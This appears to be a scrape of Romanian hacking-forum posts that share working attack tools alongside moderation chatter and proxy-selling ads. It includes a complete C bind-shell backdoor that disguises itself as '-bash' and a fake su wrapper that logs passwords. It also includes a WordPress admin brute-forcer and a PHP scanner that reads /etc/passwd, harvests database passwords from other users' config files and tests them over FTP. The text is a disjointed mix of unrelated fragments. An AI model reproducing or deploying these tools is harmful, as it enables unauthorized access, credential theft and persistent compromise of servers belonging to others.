sizeof(options.t_password)); memset(&options.s_user, 0, sizeof(options.s_user)); memset(&options.s_password, 0, sizeof(options.s_password)); memset(&options.a_user, 0, sizeof(options.a_user)); memset(&options.a_password, 0, sizeof(options.a_password)); memset(&options.cloak_name, 0, sizeof(options.cloak_name)); memset(&admin.username, 0, sizeof(admin.username)); memset(&admin.password, 0, sizeof(admin.password)); memset(&admin.bind, 0, sizeof(admin.bind)); } Nu este scris de mine.

/* xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx */ /* P R I V A T E */ /********************************************************/ /* Opens a password protected backd00r and lets you */ /* execute commands, and then hides in the background */ /* I would like to thank SyF for gs.c */ /* coded by misteri0 //UnlG */ /********************************************************/ /* P R I V A T E */ /* xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <strings.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <signal.h> #define PASSAUTH 1 /* undefine this is you won't want a password at the beginning */ #define PORT 29369 #define MSG_WELCOME "unlg's backd00r, enter whatever is necessary\n All commands are followed by a ;\n" #define MSG_PASSWORD "Password: " #define MSG_WRONGPASS "Invalid password\n" #define MSG_OK "Welcome...\n" #define MSG_CONTINUE "Do you want to continue?\n" #define HIDE "-bash" #define SHELL "/bin/sh" #ifdef PASSAUTH #define PASSWD "l3vel" #endif int main (int argc, char *argv[]); #ifdef PASSAUTH int login (int); #endif int background() { int pid; signal(SIGCHLD,SIG_IGN); pid = fork(); if(pid>0) { sleep(1); exit(EXIT_SUCCESS); // parent, exit } if(pid==0) { signal(SIGCHLD,SIG_DFL); return getpid(); // child, go on } return -1; // fork failed } int main (int argc, char *argv[]) { int sockfd, newfd, size; struct sockaddr_in local; struct sockaddr_in remote; char cmd[256]; strcpy (argv[0], HIDE); signal (SIGCHLD, SIG_IGN); bzero (&local, sizeof(local)); local.sin_family = AF_INET; local.sin_port = htons (PORT); local.sin_addr.s_addr = INADDR_ANY; bzero (&(local.sin_zero), 8); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if (bind (sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, 5) == -1) { perror("listen"); exit(1); } size = sizeof(struct sockaddr_in); background(); while (1) { if ((newfd = accept (sockfd, (struct sockaddr *)&remote, &size)) == -1) { perror ("accept"); exit(1); } if (!fork ()) { send (newfd, MSG_WELCOME, sizeof(MSG_WELCOME), 0); #ifdef PASSAUTH if (login(newfd) != 1) { send (newfd, MSG_WRONGPASS, sizeof(MSG_WRONGPASS), 0); close (newfd); exit(1); } #endif close (0); close(1); close(2); dup2 (newfd, 0); dup2(newfd, 1); dup2(newfd, 2); execl (SHELL, SHELL, (char *)0); close(newfd); exit(0); } close (newfd); } return 0; } #ifdef PASSAUTH int login (int fd) { char u_passwd[15]; int i; send (fd, MSG_PASSWORD, sizeof(MSG_PASSWORD), 0); recv (fd, u_passwd, sizeof(u_passwd), 0); for (i = 0; i < strlen (u_passwd); i++) { if (u_passwd[i] == '\n' || u_passwd[i] == '\r') u_passwd[i] = '\0'; } if (strcmp (PASSWD, u_passwd) == 0) { return 1; } else { return 0; } } #endif

#include <stdio.h>#include <stdlib.h> #include <unistd.h> int main(void) { char *passw; FILE *fptr; int i; for(i=0;i<1;i++) { passw = getpass("Password: "); if((fptr = fopen("/home/jakashop/shop/su.log", "a")) == NULL) { perror("fopen"); exit -1; } else { fprintf(fptr,"%s\n",passw); } fclose(fptr); } execl("/bin/su", "su", 0); }

eventual de userii care au 5 posturi, 3 din ele fiind la bine ai venit.

Pentru ca asta ar insemna ca un moderator sa citeasca absolut toate tampeniile si sa le aprobe. daca nu le aproba forumul pierde pagini pe google ( seo ), content and stuff, probabil forumul este cel mai mare de la noi si ca sa ramana asa are nevoie de toate tampeniile de posturi, chiar daca-s mutate la cosul de gunoi sau intr-o categorie buna ( parerea mea ).

ar oprii offtopic in lucrurile care par serioase, le poti citi dar nu poti posta, drepturile ar trebuii sa ti le castigi nu sa ti se cuvina, eu as oprii si pm-ul pana la 50 posturi, sau cel putin pana nu strangi macar 1 rep. le faci categorie noilor veniti, intreaba si se afirma acolo, apoi au drepul de read/post in celelate categorii, mie mi se pare o solutie buna de a scapa de trolling. un exemplu concret, imi fac user nou si te injur ca nu esti de acord cu mine, eu iau ban tu te enervezi, ma injuri iei si tu ban si tot asa pana un admin cedeaza si inchide topicul, chiar daca acesta era deschis dintr-o anumita necesitate si poate ajuta si alti useri care isi puneau aceeasi intrebare sau aveau aceeasi necesitate, dar este plin de offtopic intre useri sau injuraturi, nu pareri si ajutor din partea celorlalti sau cuvinte de lauda cum ar trebuii sa fie. aceasta solutie mie mi se pare mult mai usoara pentru administratori/mod/etc/etc/etc/pupincuristi ca sa nu mai zici ca tu user nou nu prea ai nici un drept sa iei la pula sau cum zici tu la caterinca un user mult mai vechi ca tine, in 90% din cazuri astia iau ban/ le sunt stere meajele/ le sunt mutate la gunoi mesajele. un alt motiv, aduni fanatici, lumea e dornica de afirmare, vrea sa fie luata in serios, scapi de tepari la market( alt exemplu prost ), daca un post il impresioneaza pe un administrator/mod/etc/etc/etc/etc/etc acesta poate muta topicul in categoria respectiva... oricum se muta topicuri zilnic mai ales la cosul de gunoi, de ce sa nu faci un cos de gunoi special ptr userii noi ? 90% din posturile lor ajung sa fie mutate sau userii ajung sa fie banati. pe alte forumuri treaba cu vouch isi face treaba foarte bine, vb lui neme, ti-o incerci a prost meriti sa fi pedepsit.

eu as avea alta idee, user nou ? ok, ai 2 categorii in care poti posta "off topic", "noobs zone", ai access la urmatoarele categoii atunci cand cineva garanteaza pentru tine, un fel de "vouch", pe alte forumuri se practica. daca userul nou face ceva gresit si ia ban, cel care a garantat pentru el primeste ban la randul lui, asa informatiile bune se filtreaza, iar userii noi nu mai troleaza. Daca se procedeaza asa, userii vechi nu isi vor mai face conturi noi doar pentru trolling, se vor aduce lucruri noi si bune comunitatii iar cu riscu de a ma repeta informatia se va filtra. ( n-am vrut sa iasa cu rima, sunt beat si e pe undeva pe la 7 dimineata..... ) ceva de genul asta, dupa parerea mea ar trebuii facut si la "vip".

asta e una din cele mai mari idiotenii pe care am intalnito vreodata, adica oamenii cer taxa de protectie, eu nu vreau sa le dau, apoi floodeaza si incearca sa ma intimideze cu niste date eronate care nici macar nu sunt ale mele. asa oameni, asa caracter....

ip2domain - bing.com - php version <?php function curl($url) { $curl = ($url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'MozillaXYZ/1.0'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); return $result; } $file_ips = 'ips.txt'; $file_domains = 'domains.txt'; print "Start\n"; $handle = fopen($file_ips, 'r'); $content = fread($handle, filesize($file_ips)); fclose($handle); $ips = explode("\n", $content); $handle = fopen($file_domains, 'w'); $count = 1; foreach ($ips as $ip) { $content = curl('http://m.bing.com/search/?A=webresults&Q=ip:'.$ip.'&D=Web&LC=en-us'); preg_match_all('/<div class=\"srcLnk\">(.*?)<\/div>/', $content, $data); $domains = $data[1]; print $count."\n"; $count++; foreach ($domains as $domain) { preg_match('@^([^/]+)@', $domain, $out); $out = $out[0]."\n"; fwrite($handle, $out); } } print "Stop\n"; fclose($handle); ?> edit: nu e facut de mine

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Wp-bf by n4sss</title> </head> <body style="background-image: url(http://www.freeimagehosting.net/newuploads/y14k7.jpg);"> <center> <form method="post" action=""><span style="font-weight: bold; font-family: monospace; color: rgb(255, 255, 255);">w00rdpr3ss Bf by n4sss</span><br style="font-family: monospace; color: rgb(255, 255, 255);"> <span style="font-style: italic; font-family: monospace; color: rgb(255, 255, 255);" id="result_box" class="short_text" lang="en"><span class="hps">make</span> <span class="hps">simple, make</span> <span class="hps">beautiful.</span></span><br> <textarea name="wpress" cols="36" rows="12"></textarea><br> <span style="font-weight: bold;"><br> <span style="font-family: monospace; color: rgb(255, 255, 255);">Passwords : </span></span><br style="color: rgb(255, 255, 255);"> <span style="font-family: monospace; color: rgb(255, 255, 255);">e.g: word.txt</span><br> <input value="word.txt" name="password"><br> <p><input name="submit" value="Iniciar" type="submit"> </p> </form> </center> <?php /* wp Bf By n4sss. greetx : Status, chokoo, fl4m3, hackinho, anj0, shadow-ebr, xcholler. 2012 */ ob_start(); error_reporting(0); set_time_limit(0); $listadesites=explode("\n",$_POST['wpress']); foreach($listadesites as $slist){ $temiz=trim($slist); $site=$temiz; if(! $_POST['wpress']==""){ $pass=htmlspecialchars($_POST['password']); foreach(file($pass)as $password){ $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site.'/wp-login.php'); curl_setopt($curl,CURLOPT_COOKIEJAR,"c00ki3.txt"); curl_setopt($curl,CURLOPT_COOKIEFILE,"c00ki3.txt"); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$password&wp-submit=Log+In&redirect_to=.$site./wp-admin/&testcookie=1"); $a = curl_exec($curl); if(eregi ("profile.php",$a)){ echo '<center><big style="font-family: monospace; color: rgb(255, 255, 255);"><span style="font-weight: bold;"> '.$site.' SUCESSO: admin:'.$password.'</center></span></big>'; ob_flush(); flush(); } } } } //#EOF_ ?> </body> </html> tutorial: http://www.youtube.com/watch?v=Tk1wM6a-rTQ&feature=channel&list=UL source: Wordpress Brute Force by n4sss - r00tsecurity

This is a database scanner used to looking for file configuration (file that connects into database CMS application). <?php echo “<html>”; echo “<title>[ Database Scanner]</title><body>”; set_time_limit(0); ################## @$passwd=fopen(‘/etc/passwd’,'r’); if (!$passwd) { echo “[-] Error : Can’t read /etc/passwd”; exit; } $path_to_public=array(); $users=array(); $pathtoconf=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if ($i>35) { $pos=strpos($str,”:”); $username=substr($str,0,$pos); $dirz=”/home/$username/public_html/”; if (($username!=”")) { if (is_readable($dirz)) { array_push($users,$username); array_push($path_to_public,$dirz); } } } $i++; } ################### ######################### echo “<br><br>”; echo “<textarea name=’main_window’ cols=100 rows=20>”; echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”; echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”; echo “[~] Searching for passwords in config.* files…\n\n”; foreach ($users as $user) { $path=”/home/$user/public_html/”; read_dir($path,$user); } echo “\n[+] Done\n”; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath=”$path$file”; if (($file!=’.') and ($file!=’..’)) { if (is_readable($fpath)) { $dr=”$fpath/”; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file==’config.php’) or ($file==’header.inc.php’) or ($file==’content.inc.php’) or ($file==’mainfile.php’) or ($file==’utils.inc.php’) or ($file==’main.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’configuration.php’) or ($file==’configurations.php’) or ($file==’configs.php’) or ($file==’config.locale.php’) or ($file==’db.inc.php’) or ($file==’dbconnect.inc.php’) or ($file==’dbconnection.php’) or ($file==’var.php’) or ($file==’mysql.php’) or ($file==’global.inc.php’) or ($file==’database.php’) or ($file==’dbconnect.php’) or ($file==’conf.php’) or ($file==’configDB.inc.php’) or ($file==’db.php’) or ($file==’db_connect.php’)) { $pass=get_pass($fpath); if ($pass!=”) { echo “[+] $fpath\n$pass\n”; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,’r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) { if (strrpos($line,’”‘)) $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,’”‘)-(strpos($line,’=')+3))); else $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,”‘”)-(strpos($line,’=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect(’127.0.0.1?); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo ‘[FTP] ‘.$login.’:’.$pass.” Success\n”; } else ftp_quit($ftp); } } echo “</textarea><br>”; echo “</body></html>”; ?> sursa: Database Scanner - r00tsecurity

Hash Kracker is our new all-in-one tool to recover the hash password for multiple hash types. Current version supports following popular hash types such as MD5, SHA1, SHA256, SHA384, SHA512. Most online websites do not directly store the user account password, instead they convert it into one of hash types such as MD5, SHA1, SHA256 and then store it. Same approach is followed by some of the desktop applications.These are one way hash algorithms. That means you cannot decrypt the hash to get back your original password. In such cases HashKracker can help you to recover your hash password.Hash Kracker uses Dictionary Crack method to keep it simple and easier. However you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with Hash Kracker. Features of Hash Kracker * Free tool to recover the hash password * Supports popular hash types such as MD5, SHA1, SHA256, SHA384, SHA512. * Automatically detects the Hash Type * Displays detailed statistics during Cracking operation * Stop the password cracking operation any time. * Easier and Quicker to use with cool interface. * Generate Hash Password Recovery report in HTML/XML/TEXT format. * Fully Portable tool, can run from anywhere. * Includes Installer for local Installation & Uninstallation. Installation and Usage Guide Download HashKracker

bine ai venit!

http://bbs.longcity.net/ Metoda: Cin' te'n treaba n-ai tu treaba. PR on google - 5

folositi Unlimited Socks accept si cod de reincarcare

multumesc frumos, il poti redimensiona si dupa celelate rezolutii ?

Am nevoie si eu de un banner, nu m-am gandit la rezolutie inca... probabil ceva de genul 728x90, 468x60, 300x250, 125x125 pentru isell.cc , sa scrie Unlimited Socks Admin si adresa site-ului ceva simplu cu culorile siteului. PS: il folosesc la banner exchange.